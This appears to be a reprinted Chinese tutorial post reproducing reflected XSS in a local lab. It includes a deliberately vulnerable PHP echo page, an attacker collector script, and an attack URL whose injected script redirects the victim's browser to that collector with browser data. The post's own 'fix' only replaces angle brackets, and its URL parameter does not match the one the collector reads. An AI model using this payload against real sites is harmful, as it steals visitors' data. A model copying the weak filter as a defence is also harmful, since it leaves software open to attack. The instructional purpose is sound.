2. 程式人生 > 實用技巧 >反射型 XSS 原理復現

反射型 XSS 原理復現

阿新 發佈:2020-12-24

反射型 XSS 復現記錄


整個漏洞含有三個實體:

  • 攻擊者
  • 受害者
  • 網頁伺服器:http://192.168.64.2/index.php

製作漏洞

網頁伺服器程式碼:

<?php 
    echo $_GET['xss'];
?>

利用漏洞

攻擊者漏洞利用流程:

  • 構造含有 XSS 程式碼的 URL
  • 受害者執行 URL
  • XSS 程式碼在受害者瀏覽器上執行,獲取資訊
  • XSS 程式碼將獲取的資訊傳送給攻擊者

攻擊者接收 XSS 程式碼傳來的資訊:http://192.168.64.2/hack.php

<?php
	$file = fopen('資訊.txt','w');
	fwrite($file,$_GET['info']);
?>

攻擊者構建的 URL :

http://192.168.64.2/?xss=
<script> window.location.href='http://192.168.64.2/hack.php?hack=' %2B navigator.platform </script>

受害者訪問 URL 之後,資訊.txt 的內容

MacIntel

修復漏洞

網頁伺服器程式碼:

<?php
    $safe1 = str_replace('>','臭不要臉,黑老子站',$_GET['xss']);
    $safe = str_replace('<','臭不要臉,黑老子站',$safe1);
    echo $safe;
?>

相關推薦

反射 XSS 原理復現

反射 XSS 復現記錄 整個漏洞含有三個實體: 攻擊者 受害者 網頁伺服器:http://192.168.64.2/index.php

儲存 XSS 原理復現

儲存 XSS 原理復現 漏洞最少會影響 3 個邏輯實體: 受害者瀏覽器 攻擊者伺服器

WEB安全-反射XSS漏洞原理和實踐

XSS(跨站指令碼攻擊) 定義 瀏覽器將使用者輸入的內容,當做指令碼執行,執行了惡意的功能,這種針對使用者瀏覽器的攻擊即跨站指令碼攻擊。

基本漏洞原理及防禦(10)-DOS:反射Dos

反射dos攻擊的目的同樣是耗盡目標的資源,但是實現方式不同。 攻擊原理:是利用了很多網路協議不對源ip進行認證,來實現ip欺騙,例如udp協議就不會認證源ip。

java多機制原理特點詳解

java多機制是什麼 java中實現多的機制是依靠父類或介面的引用指向子類。從而實現了一個物件多種形態的特性。其中父類的引用是在程式執行時動態的指向具體的例項,呼叫該引用的方法時,不是根據引用變數的型別中定

Python動態強型別解釋語言原理解析

PYTHON是一門動態解釋性的強型別定義語言:編寫時無需定義變數型別;執行時變數型別強制固定;無需編譯,在直譯器環境直接執行。

程式碼審計學習—zzcms儲存xss

程式碼審計學習—zzcms儲存xss 版本:zzcms 201910 本地搭建網站 漏洞位置: 網站/inc/function.php

C++多重繼承及多原理例項詳解

一、多重繼承的二義性問題 舉例: #include <iostream> using namespace std; class BaseA {

XSS原理及程式碼分析

前言 XSS又叫跨站指令碼攻擊,是一種對網站應用程式的安全漏洞攻擊技術。它允許惡意使用者將程式碼注入網頁,其他使用者在瀏覽網頁時就會受到影響。XSS分為三種:反射型,儲存,和DOM。下面我會構造有缺陷的程式

pikachu靶場之DOMxss

DOM,全稱Document Object Model,是一個平臺和語言都中立的介面,可以使程式和指令碼能夠動態訪問和更新文件的內容、結構以及樣式。

xss原理解析

xss->跨站指令碼攻擊 xss是指攻擊者在網頁中嵌入客戶端指令碼。通常是指javascript編寫的一個危險程式碼,當用戶使用瀏覽器瀏覽網頁時,指令碼就會在使用者的瀏覽器上執行,從而達到攻擊者的目的。

Python面向物件多實現原理及程式碼例項

指同一個方法呼叫由於物件不同可能會產生不同的行為。 關於多要注意以下幾點:

浮點原理介紹及在記憶體中的儲存形式

浮點原理介紹及在記憶體中的儲存形式 C語言提供了浮點資料型別,單精度浮點數float和雙精度浮點數double。浮點數屬於不精確的資料型別,本文將通過float型別的原理和在記憶體中的儲存形式來介紹浮點不精確的原

【專案】 Java 過濾器 解決儲存xss攻擊問題

技術標籤:專案Javaxss攻擊JavafilterrequestinputStream XSS攻擊場景 攻擊者可以通過構造URL注入JavaScript、VBScript、ActiveX、HTML或者Flash的手段,利用跨站指令碼漏洞欺騙使用者,收集Cookie等相關資料並冒

Catfish(鯰魚) Blog V1.3.15儲存 xss

Catfish(鯰魚) Blog前臺文章評論處存在 儲存xss漏洞。在 application\\index\\controller\\index.php 檔案第 692行

12年高階工程師的“飛昇之路”,Android多實現原理

1. Kotlin ? Kotlin 通常被視為下一個 Java,它是由谷歌和 JetBrains(Android Studio 開發者)贊助的。Java 從一開始就一直是 Android 應用的首選開發語言,但近年來 Kotlin 迅速普及,如今在 10,000 種 Google

2022-01-07 DOMXSS

DOMxss不像反射xss和儲存xss那樣會與後臺互動,DOMxss的實現過程都是在前臺。

Java進階 | 泛機制與反射原理

一、泛的概念 1、基礎案例 泛在Java中的應用非常廣泛,最常見則是在集合容器中,先看下基礎用法:

反射和多的實現原理詳解以及區別

在Java技術體系中所提供的能夠讓我們在執行時識別物件和類的型別資訊的方式,一共有兩種:即反射和多關鍵技術RTTI。

Java反射原理分析 - Method篇

反射方法剖析 Class物件提供以下獲取物件的方法(Method): getMethod - 返回類或介面的特定方法,只能是public修飾的方法。